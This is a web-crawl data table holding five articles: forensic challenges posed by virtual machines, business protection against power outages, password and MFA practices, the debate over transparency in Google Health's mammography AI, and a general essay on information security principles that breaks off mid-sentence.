text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Virtualisation software allows a complete operating system to run from within another. So for example, a user might have a computer running Windows Vista, but by installing virtualisation software, they could run a copy of Windows XP from the desktop. This virtual operating system can then perform every action a ‘real’ virtual operating system can, including browsing the internet, editing files and accessing the CD-ROM drive or other portable media. Such functionality might seem useless to some, but for many users it has a number of applications. For example, because virtualisation software can be stored on portable media such as a USB storage device, it allows the user to effectively take an entire user environment with them wherever they go. So rather than just carrying files, they can access all of their preferences on any machine. Alternatively, the same user may wish to access a piece of software that only works on the XP version of Windows. By installing virtualisation software, they could access this without having to revert the whole machine back to an older operating system. Where it is suspected that a computer has been used in the commission of a crime, however, these same benefits can become barriers to a successful investigation. Upon arrest of a suspect, computer equipment is typically confiscated and passed to an expert for computer forensic analysis. Such experts then aim to extract legally admissible evidence in the form of deleted files, registry entries and internet browsing histories. However, where a virtual machine has been used, the browsing history and registry data is written to the virtual machine and not to the host computer. This means that if the portable storage device is removed, there will be little or no evidence of user activity on the host machine. Most virtual machines require the user to install software on to the host, so there may at least be registry digital evidence that the software itself was once present, but some can be accessed directly from a CD-ROM or USB storage device, in which case even less of a trace would be left. For this reason, computer forensic analysts typically check the registry for signs that removable media has been connected. In some cases, computer forensic experts may be able to extract information about activity on a virtual machine by analysing the communications between the portable device and its driver, stored on the host machine. The common use of portable media to store virtualisation software makes it all the more important that such devices are located and analysed in any computer forensic investigation. Yet even if the virtualisation software is located, a core problem for computer forensic analysts is posed where the user does not save the environment in its new state before exiting. Essentially, this means that records of activity will be permanently deleted in a way that makes them impossible to recover. At present, the use of virtualisation software in the home is relatively uncommon, and server side monitoring of those accessing indecent images of children or other such illegal material is still effective in capturing perpetrators, even where virtualisation software is in use. Nevertheless, the recovery of computer based evidence remains vital, so computer forensics is now moving into the virtual world, finding new ways to extract data from ever more elusive virtual machines. To find out more about our services Tel: 0247 77 17780 to speak with a member of the team or fill-in our online contact form.
<urn:uuid:dac5c331-d2a8-43f9-a192-9ca979779260>
CC-MAIN-2022-40
https://www.intaforensics.com/2010/10/29/virtualisation-software-in-computer-forensic-investigations/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00732.warc.gz
en
0.939142
665
3.078125
3
Commercial electrical power can be lost due to downed lines, malfunctions at a sub-station, inclement weather, planned ‘rolling‘ blackouts, or in extreme cases a grid-wide failure. As a business continuity practitioner, I regularly explore if businesses have implemented any ‘lessons learned’ from the Northeast power ‘Blackout’ of 2003. The answers vary from ‘yes we did’ to ‘why – it may never happen again’. It has been 10 years since this event caught most off guard in its reach and magnitude. This blackout was a wide-reaching power outage that occurred throughout parts of the northeastern and Midwestern United States and many eastern Canadian provinces (including Ontario) later in the afternoon on Thursday, August 14, 2003. While some power was restored within six hours, many business and residences were at loss for upwards of 48 hours. It was estimated that the Blackout affected an estimated 10 million people in Ontario and 45 million people in the United States. The Blackout’s primary cause was assigned to a computer program glitch at a control room of the FirstEnergy Corporation in Ohio. Operators were unaware of the need to redistribute power after transmission lines were overloaded. The glitch had the potential to be a manageable operational procedure with minimal local power loss disruption, but it turned into a national widespread event affecting many consumers (business and residential) in the northeastern and Midwestern United States and eastern Canada. Even when power was getting restored, affected areas were requested to limit power usage until the grid was back to full power. Critical infrastructure impacted at that time included the water supply (lost water pressure), transportation (railroad service was stopped north of Philadelphia and the New York City area) and Canada’s Via Rail, which serves Toronto and Montreal and suffered schedule delays. Airports were closed. Many gas stations were unable to pump fuel due to lack of electricity. Many oil refineries on the east coast of the United States shut down and were slow to resume gasoline production. The Blackout impacted communications well outside the immediate area of outage. Cellular communication devices were disrupted. Landline telephone continued to work, although some systems were overwhelmed by the volume of traffic, and millions of home users had only cordless telephones dependent on house current. It is well known through many studies that power failures and power surges are by far the most frequent (45%) cause of data loss in IT systems (Source: ContingencyPlanning). Fortunately, with proactive planning and implementation of cost effective strategies, you can protect your business and mitigate the impacts against power disruption. Getting Started – Protecting Your Computers, Servers and Data Computing technology requires a constant and uninterrupted feed of stable and “clean” electrical power, which is power that does not ‘surge’ or ‘fail’ at any time. Taking a proactive approach with power loss planning – like designing a system that mitigates the impact to operations – and protecting your computers, servers and data from service interruptions is simple if you follow the steps below: - Inventory all electronic equipment to be protected. This can be done by undertaking a business impact analysis (BIA) which will define which processes and underlying IT and other technology infrastructure must be preserved when power failure and surges occur. BIAs should also address all costs to your business when the power goes out, including quantifying the cost of lost operational data, lost sales (current or future revenue), and impacts to the ‘customer experience’ — who rely on products and service delivery for their business. - Include locations and required wattage required for each piece of equipment you want to connect to uninterruptible power to protect needed equipment. - Include electrical outlets, plug type, circuit information, and amperage. - Decide what level of power protection is required to provide each piece of equipment - Does this equipment need power protection (i.e. surge protectors)? - Does this equipment need uninterrupted power? (If the equipment is critical to the operation of your business and needs several minutes to safely shut down, it should be connected to an uninterruptible power supply [UPS].) - How long do I want my equipment to be able to run in case of a blackout? (The total power demand [wattage] needed to operate the needed equipment during a blackout and the length of time you need your equipment to be operational will define whether a UPS or emergency power generation [EPG] equipment is needed. - Do I need software that will automatically shut down my computer and save my files in the event of a blackout? (Many UPS’s have software that will automatically sense a power outage and perform an orderly shutdown of a computer connected to it. It is strongly recommended to install automatic shutdown software for all network servers.) - Develop appropriate mitigation strategies and implement Power Protection Equipment. There are three key basic levels of Power Protection Equipment commonly used today. Understanding the differences will help you decide which level is appropriate in protecting your business and equipment. Level 1 Protection: The Surge Protector The Surge Protector is a device that shields computer and other electronic devices from surges in electrical power or transient voltage, which flow from the power source. The standard voltage for homes and office buildings is 120 volts. Anything over this amount is considered transient and can damage electronic devices that are plugged into an outlet. It works by channeling the extra voltage into the outlet’s grounding wire, preventing it from flowing through the electronic devices while at the same time allowing the normal voltage to continue along its path. Level 2 Protection: The Uninterruptible Power Supply (UPS) An uninterruptible power supply — also known as an uninterruptible power source, UPS, or battery backup — is an electrical apparatus that provides emergency power to a load when main (commercial) power is interrupted or fails. A UPS provides battery backup that aids in saving data by keeping computer systems running with no interruption in the event of a brownout, blackout, or overvoltage. UPS’s also offer protection from surges, spikes, and sags. Many UPS’s are sized to allow computers attached to them to run for 10-25 minutes. This is sufficient time for users to log off their computers, write unsaved data to disk, and perform an orderly shutdown of the operating system. For a small network server room, expect to pay between several hundred to a few thousand dollars for UPS’s, and tens of thousands for larger server rooms. Advanced UPS systems with unique software are able to ‘sense’ power disruptions and can issue shutdown commands to the operating system to safely shut down any computers connected to them, aiding in saving data. Level 3 Protection: Emergency Power Generation Equipment A longer term power supply strategy during the loss of power to the UPS is the Emergency Power Generator (EPG). The EPG is usually powered by gasoline or diesel fuel and can provide power for extended periods. In a small installation, a portable generator is placed outside your business and extension cords are run from the generator to critical equipment and portable lights. For more complex environments, or permanent installations, the generator is permanently mounted and connected to the main power supply for the building. For most small businesses, the cost of emergency power generation equipment is prohibitive, costing several thousand dollars or more. Most businesses choose to implement uninterruptible power supplies (UPS). In modern buildings, most emergency power systems are still based on generators. Usually, these generators are driven by a diesel engine; although smaller buildings may use a generator driven by a gasoline engine, and larger ones driven by a gas turbine. It should be noted most typical building emergency power systems supply emergency lighting to allow for safe exit during building evacuations and for illuminating service areas such as mechanical rooms and electric rooms. Exit signs, fire alarm systems and the electric motor pumps for the fire sprinklers are almost always run by emergency power. If you need emergency power from such generating equipment to ensure normal operations during power outages, then it must be designed, installed, and tested to ensure it meets with your defined performance requirements. For example, hospitals use emergency power outlets to power life support systems and monitoring equipment. If you forego building the required infrastructure to address power surges and outages to protect from IT systems data and performance losses, you can move your applications/business systems to “cloud computing’. While cloud computing and data storage is accessible to all sizes of companies, the choices are endless. The question remains which one is right for your organization? You need to consider speed, security, scalability, recoverability, compliance and price. In addition, business interruption insurance coverage is designed to help businesses that lose revenue due to unexpected shutdowns or limitations of operations. Generally, coverage is designed to protect a business’s income flow rather than its property. Business owners should familiarize themselves with the types of events that might force them to close and know whether these events arise from perils excluded from their property and business insurance coverage. We can all learn from the recent power outage events and power outages are becoming more frequent. Having a plan of action to protect your business assets is one of the most cost effective strategies available. Take the challenge and learn what to do before disaster strikes….you can’t predict an emergency but you can prepare for one. Be ready for anything: download ‘Business Continuity Planning for SIP Trunking: Ensuring Critical Connections,’ a white paper from Allstream.
<urn:uuid:7399488b-895c-4bb2-a203-1d62bdb9b0e2>
CC-MAIN-2022-40
https://blog.allstream.com/protecting-your-business-against-power-outages-batteries-included/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00732.warc.gz
en
0.95473
1,968
2.609375
3
If you don’t want to fall victim to a cybersecurity incident, you need a strong password. “Breaches, as always, continue to be mostly due to external, financially motivated actors. And 61% of breaches involved credential data,” Verizon revealed in their 2021 Data Breach Investigations Report of nearly 30,000 cybersecurity incidents. Having a strong password is a great first start in preventing a cybersecurity incident. While they aren’t the only protection an organization can put up against data breaches, they can mitigate the damage. Here’s how to audit your accounts for password strength, and what else you can do to protect your data. First, be sure to include passwords in your security awareness program—educate your employees (and customers) about what a good password looks like, how often it should be changed, and the importance of why passwords matter. Be sure to highlight the following tips in your security awareness program: In your security awareness program, highlight examples of good passwords using the principles mentioned above. Passphrases are often preferred to passwords because they’re harder to figure out. For example, you may consider converting a phrase to an acronym and use that as your password: ApIw1,0o0W → A picture is worth a thousand words Find a phrase that is unique to you. Compared to good passwords, bad passwords are commonly used and easy to guess. The top 10 worst passwords in 2020, according to NordPass, were: Combined, those passwords were exposed nearly 50 million times. Most took less than a second to crack. Bad passwords also include sensitive data such as birthdays, anniversaries, street addresses, and other information that is connected to the user. Having a strong, unique password or passphrase for each of your accounts is challenging. That’s why we recommend IT departments install and enforce the use of a password manager across their network. Password managers generate, store, and help you update passwords. Most password managers also offer users and IT departments real-time security checks to help you understand whether specific passwords have been potentially compromised in a cybersecurity incident. Plus, password managers also help you understand the age of a password—industry regulations may dictate or recommend that passwords change regularly, such as every 30, 60, or 90 days. That way, you can know when an older password needs to be changed for a newer one. Finally, we recommend—and some industries require—the use of multi-factor authentication (MFA) to help keep your sensitive information protected. MFA requires more than just a password to ensure the user logging in is the person who is supposed to be there. Enabling MFA for your business means that no matter how clever the criminal, they will still be missing one or more factors, preventing access. MFA has five key factors: Overall, we recommend a thorough audit of your business’s passwords in order to either achieve compliance or to implement best practices for your organization. By educating your team about the importance of strong passwords and password management, your business maintains a much better defense against cybersecurity threats than those who don’t. Passwords and MFA are just two components of a comprehensive data security plan. How many of these 20 safeguards does your business protect against? Download your Data Security Checklist today!
<urn:uuid:3538e6de-b273-4a9f-b84b-925f578fe451>
CC-MAIN-2022-40
https://blog.integrityts.com/password-strength-audit-your-accounts-today
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00732.warc.gz
en
0.939989
699
2.65625
3
On the surface, an artificial intelligence (AI) that can detect breast cancer from a mammogram scan image more successfully than a human radiologist seems like a game-changing use of technology. This is what Google Health proudly announced in January, publishing a paper in the Nature journal stating that its algorithm was more successful than six radiologists at identifying cancer from a large dataset of breast scans. Screening for breast cancer is the first line of defence against the disease and, for many women, early diagnosis can literally be a matter of life or death. Interpreting the scans is a laborious and tricky task for radiologists, as the cancer is often hidden under thick breast tissue. So the idea that an AI could share or one day take over this workload is an alluring one, which caught the attention of the medical research community. “When this Google AI paper got published I was very excited,” says Dr Benjamin Haibe-Kains, a senior scientist at Toronto’s Princess Margaret Cancer Centre, one of the world’s largest cancer research centres, and associate professor in the Medical Biophysics department of the University of Toronto. “I do a lot of analysis of radiological images and work with a lot of radiologists, and we all understand that the current way of doing things is super-tedious and we need to do better.” The only problem was that when Dr Haibe-Kains went to look for the code and the model behind the algorithm, he could not find any details in the paper. This led to him and 19 colleagues affiliated to leading institutions such as McGill University, the City University of New York (CUNY), Harvard and Stanford to publish a rebuttal in Nature this month. The group contends that the absence of information about how Google Health’s AI works “undermines its scientific value”, restricting the ability to carry out peer review or spot potential issues with its methodology. The ensuing debate goes to the heart of an issue affecting many of the AI systems which are playing an increasingly important role for businesses around the world; how much AI transparency should we expect, and how do we ensure developers lift the lid on how their systems operate? No code, no model, no transparency? Dr Haibes-Kains and his colleagues were prompted to act because they felt the Google Health research did not meet the usual standards for a scientific research paper. “I read the Google AI paper, got very excited, read the method section and thought ‘okay, let’s do something with this’,” he says. “Then I looked for the code, there was none to be seen. I looked for the model, there was none to be seen. They are publishing in a scientific journal, so it is Google’s responsibility to share enough information so that the field can build upon their work. “For us Nature is the holy grail, the best of the best, and if we want to publish in it we will be asked to share all our code, all our data and everything else. It seems that for Google that was not the case, which came as a surprise. “As researchers we love this technology and want it to work, but with no way for us to test a model in our own institutions, we have no way for us to scrutinise the code and learn from it.” He adds: “I’ve got into many heated discussions about this, and a lot of people will say it’s a great technology and we should trust the results. My response to them would be to ask how does this change the way you would treat patients? How does it help you in any way? It doesn’t because without the code you can’t recreate it. Even if you tried, using the information available, it would take at least six months and you still couldn’t be sure you had a result which was close to their model, because there’s no clear reference available.” Software as a medical device In response, the authors of Google’s initial paper say they have put enough information out there that “investigators proficient in deep learning should be able to learn from and expand upon our approach”. They add: “It is important to note that regulators commonly classify technologies such as the one proposed here as ‘medical device software’ or ‘software as a medical device’. Unfortunately, the release of any medical device without appropriate regulatory oversight could lead to its misuse. “As such, doing so would overlook material ethical concerns. Because liability issues surrounding artificial intelligence in healthcare remain unresolved, providing unrestricted access to such technologies may place patients, providers, and developers at risk.” Google Health adds that commercial and security considerations are also important. “In addition, the development of impactful medical technologies must remain a sustainable venture to promote a vibrant ecosystem that supports future innovation. Parallels to hardware medical devices and pharmaceuticals may be useful to consider in this regard. Finally, increasing evidence suggests that a model’s learned parameters may inadvertently expose properties of its training set to attack.” Commercial concerns a barrier to transparency? Tensions between academic and commercial interests are nothing new of course. “[Google’s] view is it’s not just the algorithm,” says Wael Elrifai, VP for solution engineering at Hitachi Vantara, whose team designs and builds AI systems for customers around the world. “They trained this particular one on more than nine million images, which probably cost many millions of dollars in computer time alone, not to mention the feature engineering and the testing and all these different things, This was a multi-million dollar effort, and they’re going to want some of that money back. “There will also be security concerns about people getting hold of this code and changing it, because it’s sometimes the case with deep learning that very small changes can make a big difference – on self-driving cars we’ve seen stories where you make changes of one or two pixels on a stop sign, a change which is invisible to a human being and the algorithm interprets it as a 45mph sign instead. Elements of these AI systems are brittle.” He continues: “In general, I’m with the academics on this one, because I’ve never heard of a scientific paper that doesn’t give you enough information to reproduce the results. That’s the fundamental idea behind any scientific paper and without that it’s just marketing.” Does AI transparency keep customers happy? Though companies such as Google may be reticent to fully show their working, customer demand may drive them to be more open. Mohamed Elmasry has been working in AI and the development of commercial technologies for 16 years, and is now CEO of Tactful AI, a UK start-up which uses machine learning to augment the customer experience. Among other things, its system listens in on calls between businesses and their clients and automatically provides the call handler with information relating to what is being discussed. He says: “In our conversations with customers, we’re starting to hear more interesting questions like where are you going to get your data from? How can you use data we already have? How long does it take to get the models to a state that I can use? What’s the cycle of improving the training?'” “All of these type of questions have started being asked in the last few months and we’ve never seen that before,” Elmasry explains. “People are becoming more educated, not only because the level of adoption of AI has increased, but also because of the huge digital transformation we see everywhere.” Elmasry says Google’s approach may reflect attitudes in AI development that have prevailed since the technology started to gain momentum. “At the start of the age of AI, providers would talk about how we could help businesses and so on,” he says. “Back then it was a little difficult to explain to them the kind of transformation they needed to do at operational level in order to get the results we were actually quoting in our marketing materials and research. “So I think most of the providers got into the habit of neglecting the technical information and focusing on what we had achieved instead. “The problem with that is that when you get into the sales process with your customers, you face the challenge of helping them understand that AI is a very nice tool that can give them lots of good results, but equally they need to invest in changing how they operate, and spend time on data, training and labelling. You meet some big businesses and they expect that AI is just going to work straight out of the box without training it on their exact use case. “Here maybe Google is just trying to say we have a really promising future and we are going to achieve this and this, but decided not to get into the details of how everything happens because they felt they were addressing customers more than the research community.” Can AI be truly transparent? Adam Leon Smith is CTO of AI consultancy Dragonfly and editor of an ISO/IEC technical report under development on bias in AI systems. He told Tech Monitor that it is difficult to make deep learning AI systems (also known as deep neural networks), such as the Google Health AI, truly transparent. “There’s an aspect of transparency that’s more dynamic, often called explainability,” he says. “That is knowing why an AI did what it just did, which is an unsolved problem with many deep neural networks.” Leon Smith says this means there are always opaque parts of such systems, and does not expect a solution to appear any time soon. “The problem is that the internal features space of a neural network is so different to how you would describe the business problem or the real-life problem it is addressing,” he adds. “It’s very, very esoteric. “There are mechanisms that you can use to try and reverse engineer it and come up with statistical correlations and try and come up with a generalised relationship between certain inputs and outputs. I think the problem will ultimately be solvable, but it isn’t now.” The future of AI transparency: standards and regulation? In their paper, Dr Haibe-Kains and his colleagues call for greater independent scrutiny of models presented in research papers, particularly those pertaining to healthcare. They propose a mechanism through which independent investigators are given access to the data and can verify the model’s analysis, as has been used in other areas. “Ultimately I think we should just be much more upfront and transparent about what a paper is about,” Dr Haibe-Kains says. “If the paper is about research, then there is no excuse [to not be transparent]. You have all those technologies that makes it super-easy to share the code, the models and even the data to a certain extent. “If you’re in industry, you have a great product, and you want to tell the world, including the scientific community, how great it is, then just be up-front about it. Then it’s not about research, it’s about evaluation of a technology and you can say we are not going to disclose the full details because that’s not what is expected.” Leon Smith believes greater standardisation is required to enable relevant parts of AI algorithms to be scrutinised by the companies investing in them as part of digital transformation projects. He says: “When I talk to C-Suite people at companies who are selling AI products, they are bombarded with questions from clients who are trying to get their arms around this topic, and haven’t got a standard way to address it. So if they’re producing something where there’s a legal risk, such as under data protection legislation, they would benefit significantly from having one single checklist of things that they have to go through so they know which data they have to provide to their clients. “I think the good players in the industry are certainly interested in this sort of thing. If you look at how we do it in areas like cybersecurity, we have established frameworks, procedures and standards that you will insist companies in your supply chain comply with. And you have independent auditors that will attest that a company is meeting those standards. I think that’s realistically the only way to go in terms of enforcing things in AI.” Elrifai is in favour of greater regulation around the development of AI algorithms so that increased transparency would become a requirement. “The bottom line is we all subsidise Google very heavily one way or another so they do have certain responsibilities,” he says. “We wouldn’t accept it if an arms manufacturer was assembling nuclear weapons and one of them blew up every six months. I think they need some guard rails in the way they operate, and it’s not crazy to heavily regulate some industries. “In the UK, you have to offer the lowest price you can when selling to the NHS because you have a public rule that says health is special and has to be considered separately from the rest of the market. I think in areas like AI it’s okay to tell companies, such as Google, that they cannot just go in and maximise income.”
<urn:uuid:eb56e83b-91da-4bba-983b-70da1e6eb3aa>
CC-MAIN-2022-40
https://techmonitor.ai/technology/emerging-technology/ai-transparency-google-health
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00132.warc.gz
en
0.96638
2,834
2.84375
3
Information Security is such a broad discipline that it’s easy to get lost in a single area and lose perspective. The discipline covers everything from how high to build the fence outside your business, all the way to how to harden a Windows 2003 server. It’s important, however, to remember not to get caught up in the specifics. Each best practice is tied directly to a higher, more philosophical security concept, and those concepts are what I intend to discuss here. Eric Cole’s Four Basic Security Principles To start with, I’d like to cover Eric Cole’s four basic security principles. These four concepts should constantly be on the minds of all security professionals. - Know Thy System Perhaps the most important thing when trying to defend a system is knowing that system. It doesn’t matter if it’s a castle or a Linux server — if you don’t know the ins and outs of what you’re actually defending, you have little chance of being successful. An good example of this in the information security world is knowledge of exactly what software is running on your systems. What daemons are you running? What sort of exposure do they create? A good self-test for someone in a small to medium-sized environment would be to randomly select an IP from a list of your systems and see if you know the exact list of ports that are open on the machines. A good admin should be able to say, for example, “It’s a web server, so it’s only running 80, 443, and 22 for remote administration; that’s it.” — and so on and so on for every type of server in the environment. There shouldn’t be any surprises when seeing port scan results. What you don’t want to hear in this sort of test is, “Wow, what’s that port?” Having to ask that question is a sign that the administrator is not fully aware of everything running on the box in question, and that’s precisely the situation we need to avoid. - Least Privilege The next über-important concept is that of least privilege. Least privilege simply says that people and things should only be able to do what they need to do their jobs, and nothing else. The reason I include “things” is that that admins often configure automated tasks that need to be able to do certain things — backups for example. Well, what often happens is the admin will just put the user doing the backup into the domain admins group — even if they could get it to work another way. Why? Because it’s easier. Ultimately this is a principle that is designed to conflict directly with human nature, i.e. laziness. It’s always more difficult to give granular access that allows only specific tasks than it is to give a higher echelon of access that includes what needs to be accomplished. This rule of least privilege simply reminds us not to give into the temptation to do that. Don’t give in. Take the time to make all access granular, and at the lowest level possible. - Defense In Depth Defense In Depth is perhaps the least understood concept out of the four. Many think it’s simply stacking three firewalls instead of one, or using two antivirus programs rather than one. Technically this could apply, but it’s not the true nature of Defense In Depth. The true idea is that of stacking multiple types of protection between an attacker and an asset. And these layers don’t need to be products — they can be applications of other concepts themselves, such as least privilege. Let’s take the example of an attacker on the Internet trying to compromise a web server in the DMZ. This could be relatively easy given a major vulnerability, but with an infrastructure built using Defense In Depth, it can be significantly more difficult. The hardening of routers and firewalls, the inclusion of IPS/IDS, the hardening of the target host, the presence of host-based IPS on the host, anti-virus on the host, etc. — any of these steps can potentially stop an attack from being fully successful. The idea is that we should think in reverse — rather than thinking about what needs to be put in place to stop an attack, think instead of what all has to happen for it to be successful. Maybe an attack had to make it through the external router, the firewall, the switch, get to the host, execute, make a connection outbound to a host outside, download content, run that, etc, etc. What if any of those steps were unsuccessful? That’s the key to Defense In Depth — put barriers in as many points as possible. Lock down network ACLs. Lock down file permissions. Use network intrusion prevention, use intrusion detection, make it more difficult for hostile code to run on your systems, make sure your daemons are running as the least privileged user, etc, etc. The benefit is quite simple — you get more chances to stop an attack from becoming successful. It’s possible for someone to get all the way in, all the way to the box in question, and be stopped by the fact that malicious code in question wouldn’t run on the host. But maybe when that code is fixed so that it would run, it’ll then be caught by an updated IPS or a more restrictive firewall ACL. The idea is to lock down everything you can at every level. Not just one thing, everything — file permissions, stack protection, ACLs, host IPS, limiting admin access, running as limited users — the list goes on and on. The underlying concept is simple — don’t rely on single solutions to defend your assets. Treat each element of your defense as if it were the only layer. When you take this approach you’re more likely to stop attacks before they achieve their goal. - Prevention Is Ideal, But Detection Is A Must The final concept is rather simple but extremely important. The idea is that while it’s best to stop an attack before it’s successful, it’s absolutely crucial that you at least know it happened. As an example, you may have protections in place that try and keep code from being executed on your system, but if code is executed and something is done, it’s critical that you are alerted to that fact and can take action quickly. The difference between knowing about a successful attack within 5 or 10 minutes vs. finding out about it weeks later is astronomical. Often times having the knowledge early enough can result in the attack not being successful at all, i.e. maybe they get on your box and add a user account, but you get to the machine and take it offline before they are able to do anything with it. Regardless of the situation, detection is an absolute must because there’s no guarantee that you’re prevention measures are going to be successful. The CIA Triad The CIA triad is a very important trio in information security. The “CIA” stands for Confidentiality, Integrity, and Availability. These are the three elements that everyone in the industry is trying to protect. Let’s touch on each one of these briefly. - Confidentiality : Protecting confidentiality deals with keeping things secret. This could be anything from a company’s intellectual property to a home user’s photo collection. Anything that attacks one’s ability to keep private that which they want to is an attack against confidentiality. - Integrity: Integrity deals with making sure things are not changed from their true form. Attacks against integrity are those that try and modify something that’s likely going to be depended on later. Examples include changing prices in an ecommerce database, or changing someone’s pay rate on a spreadsheet. - Availability: Availability is a highly critical piece of the CIA puzzle. As one may expect, attacks against availability are those that make it so that the victim cannot use the resource in question. The most famous example of this sort of attack is the Denial Of Service Attack. The idea here is that nothing is being stolen, and nothing is being modified. What the attacker is doing is keeping you from using whatever it is that’s being attacked. That could be a particular server or even a whole network in the case of bandwidth-based DoS attacks. It’s a good practice to think of information security attacks and defenses in terms of the CIA triad. Consider some common techniques used by attackers — sniffing traffic, reformatting hard drives, and modifying system files. Sniffing traffic is an attack on confidentiality because it’s based on seeing that which is not supposed to be seen. An attacker who reformats a victim’ s hard drive has attacked the availability of their system. Finally, someone writing modified system files has compromised the integrity of that system. Thinking in these terms can go a long way toward helping you understand various offensive and defensive techniques. Next I’d like to go over some extremely crucial industry terms. These can get a bit academic but I’m going to do my best to boil them down to their basics. A vulnerability is a weakness in a system. This one is pretty straight forward because vulnerabilities are commonly labeled as such in advisories and even in the media. Examples include the LSASS issue that let attackers take over systems, etc. When you apply a security patch to a system, you’re doing so to address a vulnerability. A threat is an event, natural or man-made, that can cause damage to your system. Threats include people trying to break into your network to steal information, fires, tornados, floods, social engineering, malicious employees, etc. Anything that can cause damage to your systems is basically a threat to those systems. Also remember that threat is usually rated as a probability, or a chance, of that threat coming to bear. An example would be the threat of exploit code being used against a particular vulnerability. If there is no known exploit code in the wild the threat is fairly low. But the second working exploit code hits the major mailing lists, your threat (chance) raises significantly. Risk is perhaps the most important of all these definitions since the main mission of information security officers is to manage it. The simplest explanation I’ve heard is that risk is the chance of something bad happening. That’s a bit too simple, though, and I think the best way to look at these terms is with a couple of formulas: Risk = Threat x Vulnerability Multiplication is used here for a very specific reason — any time one of the two sides reaches zero, the result becomes zero. In other words, there will be no risk anytime there is no threat or no vulnerability. As an example, if you are completely vulnerable to xyz issue on your Linux server, but there is no way to exploit it in existence, then your risk from that is nil. Likewise, if there are tons of ways of exploiting the problem, but you already patched (and are therefore not vulnerable), you again have no risk whatsoever. A more involved formula includes the impact, or cost, to the equation (literally): Risk = Threat x Vulnerability x Cost What this does is allow a decision maker to attach quantitative meaning to the problem. It’s not always an exact science, but if you know that someone stealing your business’s most precious intellectual property would cost you $4 billion dollars, then that’s good information to have when considering whether or not to address the issue. That last part is important. The entire purpose of assigning a value to risk is so that managers can make the decisions on what to fix and what not to. If there is a risk associated with hosting certain data on a public FTP server, but that risk isn’t serious enough to offset the benefit, then it’s good business to go ahead and keep it out there. That’s the whole trick — information security managers have to know enough about the threats and vulnerabilities to be able to make sound business decisions about how to evolve the IT infrastructure. This is Risk Management, and it’s the entire business justification for information security. Policy — A policy is a high level statement from management saying what is and is not allowed in the organization. A policy will say, for example, that you can’t read personal email at work, or that you can’t do online banking, etc. A policy should be broad enough to encompass the entire organization and should have the endorsement of those in charge. Standard — A standard dictates what will be used to carry out the policy. As an example, if the policy says all internal users will use a single, corporate email client, the standard may say that the client will be Outlook 2000, etc. Procedure — A procedure is a description of how exactly to go about doing a certain thing. It’s usually laid out in a series of steps, i.e. 1) Download the following package, 2) Install the package using Add/Remove Programs, 3) Restart the machine, etc. A good way to think of standards and procedures is to imagine standards as being what to do or use, and procedures as how to actually do it. In this section I’d like to collect a series of important ideas I have about information security. Many of these aren’t rules, per say, and are clearly opinion. As such, you’re not likely to learn them in a class. Hopefully, though, a decent number of those in the field will agree with most of them. The goal of Information Security is to make the organization’s primary mission successful Much hardship arises when security professionals lose site of this key concept. Security isn’t there because it’s cool. It’s there to help the organization do what it does. If that mission is making money, then the main mission of the security group — at its highest level — is to make that company money. To put it another way, the reason the security group is even there in the first place is to keep the organization from losing money. This isn’t a “leet” way to look at things for those who are into the novelty of being in infosec, but it’s a mentality that one needs to have to make it in the industry long-term. This is becoming increasingly the case as companies are starting to put a premium on the professionals who see security as a business function rather than a purely technical exercise. Current IT infrastructure makes cracking trivial While many of the most skilled attackers can (and have) come up with some ingenious ways to leverage vulnerabilities in systems, the ability to do what we see everyday in the security world is fundamentally based on horribly flawed architecture. Memory management, programming languages, and overall security design — none of these things we use today were designed with security in mind. They were designed by academics for academics. To use an analogy, I think we are building skyscrapers with balsa wood and guano. Crackers repeatedly tear into us at will and we can do nothing but patch and pray. Why? Because we’re trying to build hundreds of feet into the air using shoddy materials. Balsa wood and guano make excellent huts — huts that stand up to a casual rain storm and a bump or two. But they don’t do well against tornados, earthquakes, or especially hooligans with torches. For that we need steel. Today we don’t have any. Today we continue to build using the same old materials. The same memory management issues that allow buffer overflows to run rampant, the same programming language issues that allow most to write dangerous code easier than not, etc. Until we have new materials to build on we’ll always remain behind the curve. It’s just too easy to light wood on fire or smash a hole in it. So, all analogies aside, I think within the next decade or so we’ll see the introduction of new system architecture models — models that are highly restrictive and run using a “default closed” paradigm. New programming languages, new IDEs, new compilers, new memory management techniques — all designed from the ground up to be secure and robust. The upshot of all of this is that I think that within that time period we’ll see systems that can be exposed to the world and stand on their own for years with little chance of compromise. Successful attacks will still happen, of course, but they’ll be extremely rare compared to today. Security problems will never go away, we all know that, but they’ll return to being human/design/configuration issues rather than issues with gaping technological flaws. Security by obscurity is bad, but security with obscurity isn’t I’ve been in many debates online over the years about the concept of Security by Obscurity. Basically, there’s a popular belief out there that if any facet of your defense relies on secrecy, then it’s fundamentally flawed. That’s simply not the case. The confusion is based on the fact that people have heard security by obscurity is bad, and most don’t understand what the term actually means. As a result, they make the horrible assumption that it means relying on obscurity — even as an additional layer to already good security — is bad. This is unfortunate. What security by obscurity actually describes is a system where secrecy is the only security. It comes from the cryptography world where poor encryption systems are often implemented in such a way that the security of the system depends on the secrecy of the algorithm rather than that of the key. That’s bad — hence the reason for security by obscurity being known as a no-no. What many people don’t realize is that adding obscurity to security that’s already solid is not a bad thing. A decent example of this is the Portknocking project. This interesting tool allows one to “hide” daemons that are available on the Internet, for example. The software watches firewall logs for specific connection sequences that come from trusted clients. When the tool sees the specific knock on the firewall, it opens the port. The key here is that it doesn’t just give you a shell — that would be security by obscurity. All it does at that point is give you a regular SSH prompt as if the previous step wasn’t even involved. It’s an added layer, in other words, not the only layer. Security is a process rather than a destination This is a pretty common one but it bears repeating. You never get there. There’s no such thing. It’s something you strive for and work towards. The sooner one learns that the better. Complexity is the enemy of security You may call me a weirdo, but I think the entire concept of simplicity is a beautiful thing. This applies to web design, programming, life organization, and yes — security. It’s quite logical that complexity would hinder security because one’s ability to defend their system rests heavily on their understanding of it. Complexity makes things more different to understand. Enough said. My hope is that this short collection of ideas about information security will be of use to someone. If you have any questions or 